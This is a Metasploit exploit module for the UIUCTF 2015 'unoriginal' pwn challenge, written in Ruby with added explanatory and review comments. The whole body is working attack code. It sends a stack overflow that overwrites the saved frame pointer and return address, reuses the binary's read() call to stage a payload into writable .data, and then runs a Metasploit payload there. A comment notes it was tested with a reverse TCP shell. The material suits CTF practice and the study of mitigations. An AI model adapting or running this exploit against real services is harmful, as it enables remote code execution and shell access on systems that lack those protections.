UIUCTF 2015 - pwn - unoriginal
## | |
# This module requires Metasploit: http://metasploit.com/download | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/core' | |
##
# Metasploit exploit module for the UIUCTF 2015 "unoriginal" pwn challenge.
#
# Two-stage stack overflow against a 32-bit x86 Linux service, as built below:
#   1. The first socket write sends 13 filler bytes up to the saved frame
#      pointer, replaces that pointer, and points the return address at an
#      existing read() call inside the target binary, with read()'s three
#      arguments staged on the stack so the next bytes from the socket are
#      written into the binary's .data segment.
#   2. The second socket write supplies a pointer into .data followed by the
#      encoded Metasploit payload, which then runs from that segment.
#
# Defender's note: the chain only holds because the target evidently lacks
# common mitigations — it uses fixed absolute addresses (no PIE/ASLR), it
# overwrites a return address without detection (no stack protector), and it
# runs code from a writable .data segment (no NX/W^X; see the "rwx" comment
# below). Any one of those mitigations would stop the corresponding step.
##
class Metasploit4 < Msf::Exploit::Remote
  # Supplies `connect` and `sock` used in #exploit.
  include Msf::Exploit::Remote::Tcp

  # Registers the module's metadata with the framework and declares the one
  # option exposed to the operator: RPORT, defaulting to 1235.
  def initialize
    super(
      'Name' => 'uiuctf unoriginal',
      'Description' => %q{
        This module exploits the UIUCTF 2015 pwn - unoriginal challenge.
      },
      'Author' => 'jgor',
      'Arch' => ARCH_X86,
      'Platform' => 'linux',
      'License' => MSF_LICENSE,
      'Targets' =>
        [
          [ 'Automatic', {} ],
        ]
    )
    register_options(
      [
        Opt::RPORT(1235)
      ],
      self.class
    )
  end

  # Builds and sends the two payload stages described in the class header.
  #
  # Pack directives used below: 'L' is a 32-bit unsigned integer in the
  # *host's* native byte order, 'N' is 32-bit big-endian (network order).
  # NOTE(review): the two are mixed here; for fd = 0 the bytes are the same
  # either way, but read_count is emitted in network order while the target
  # is little-endian x86, so the count the target sees is byte-swapped —
  # confirm that is intended (it likely still works only because read() on
  # a socket returns whatever is available).
  #
  # Returns nothing; side effects are the TCP connection and two writes.
  def exploit
    dest = 0x08049748 # start of .data (absolute address: assumes no PIE)
    read_gadget = 0x0804843f # read() call within func() — the return target
    fd = 0 # presumably the service's socket is its stdin (inetd/socat style) — not visible here
    # count argument for the staged read(): the second write is 4 bytes of
    # pointer plus the payload; the purpose of the extra byte is not visible here
    read_count = payload.encoded.length + 5
    # opens the TCP connection to RHOST:RPORT (from the Tcp mixin)
    connect
    buf = ''
    # overflow buffer: 13 bytes of 'A' filler up to the saved frame pointer
    buf << "\x41" * 13
    # set up frame pointer (saved EBP -> just below .data start)
    buf << [dest-4].pack('L')
    # overwrite RET -> jump to existing read() call
    buf << [read_gadget].pack('L')
    # set up args to read() as the existing call site expects them on the stack
    buf << [fd].pack('N') # file descriptor 0
    buf << [dest].pack('L') # start of .data (mem range is rwx)
    buf << [read_count].pack('N') # count to read
    sock.put(buf)
    buf = ''
    # return to payload 4 bytes ahead: the staged read() lands this pointer
    # at dest, so the payload that follows it starts at dest+4
    buf << [dest+4].pack('L')
    # msf payload (tested with linux/x86/shell/reverse_tcp)
    buf << payload.encoded
    sock.put(buf)
  end
end